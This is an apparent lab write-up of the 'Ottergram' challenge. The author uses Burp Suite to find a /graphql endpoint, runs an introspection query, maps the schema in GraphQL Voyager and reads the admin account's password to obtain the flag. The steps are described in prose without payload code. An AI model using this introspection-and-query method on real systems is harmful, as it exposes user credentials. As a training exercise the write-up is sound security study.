Ottergram

GraphQL made its long awaited return!

A brand new lab made my day today. When I opened the lab, the hint was literally none, so yeah, not much to go on. Like usual, I clicked around the app, made a second account and made sure I tested the functionality over every button I could possibly click. After that, it was time to go and see what BurpSuite had captured.

First thing I noticed was a /graphql endpoint. So that was my first stop.

First thing to try with GraphQL is an introspection. Send the request to Repeater, right click and set the query.

Should that work (and in this case it did), I copied the result and put it into https://apis.guru/graphql-voyager/.

In this visual, I saw that I could query the user and the password. In the past the flag sometimes was the password of the admin account (id:2), so that's where I looked first.

Bit of both luck and experience with the way the labs are build, but I got my flag 🇧🇪